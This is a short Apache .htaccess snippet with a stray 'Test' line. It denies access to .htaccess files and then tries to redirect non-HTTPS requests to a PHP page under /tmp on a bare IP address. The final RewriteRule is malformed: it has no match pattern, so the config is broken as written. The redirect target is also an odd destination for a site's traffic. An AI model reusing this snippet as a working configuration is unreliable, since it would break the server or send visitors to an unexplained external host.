Test

# Prevent Apache from serving .htaccess files:
<FilesMatch "^\.htaccess">
    Order allow,deny
    Deny from all
</FilesMatch>
RewriteEngine on
RewriteCond %{HTTPS} !=on
RewriteRule https://164.8.230.124/tmp/snapcomp/index.php
